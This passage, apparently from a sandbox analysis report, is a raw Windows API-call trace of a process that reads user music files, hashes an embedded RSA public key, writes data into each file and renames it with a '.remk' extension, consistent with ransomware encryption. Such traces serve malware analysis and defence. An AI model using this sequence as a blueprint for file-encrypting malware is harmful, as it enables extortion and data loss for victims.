KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.200] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.201] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.201] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.202] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.202] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.202] GetLastError () returned 0x0 [0234.202] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.202] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.202] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.202] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.202] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.203] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6d0 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee6b8 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.204] GetCurrentThreadId () returned 0x314 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2cb0 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.204] GetCurrentThreadId () returned 0x314 [0234.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.207] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x121b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.207] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.207] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.207] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.207] CloseHandle (hObject=0x640) returned 1 [0234.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.210] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\M19pxLEndmqvY AcHQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\m19pxlendmqvy achq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\M19pxLEndmqvY AcHQ.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\m19pxlendmqvy achq.mp3.remk")) returned 1 [0234.212] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91861630, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0x944faa0, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0x944faa0, ftLastWriteTime.dwHighDateTime=0x1d5e569, nFileSizeHigh=0x0, nFileSizeLow=0x12166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rM_fq7OOza3eITH8.m4a", cAlternateFileName="RM_FQ7~1.M4A")) returned 1 [0234.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.212] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\rM_fq7OOza3eITH8.m4a") returned=".m4a" [0234.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\rM_fq7OOza3eITH8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\rm_fq7ooza3eith8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.214] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=74086) returned 1 [0234.214] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.217] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12140, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.217] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.218] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.219] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12166, lpOverlapped=0x0) returned 1 [0234.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.220] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.220] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.221] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.221] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.221] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.221] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.221] GetLastError () returned 0x0 [0234.221] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.221] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.221] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.221] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.222] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.222] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6e8 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee6d0 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.223] GetCurrentThreadId () returned 0x314 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2d40 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.224] GetCurrentThreadId () returned 0x314 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.225] RtlAllocateHeap (HeapHandle=0x630000, 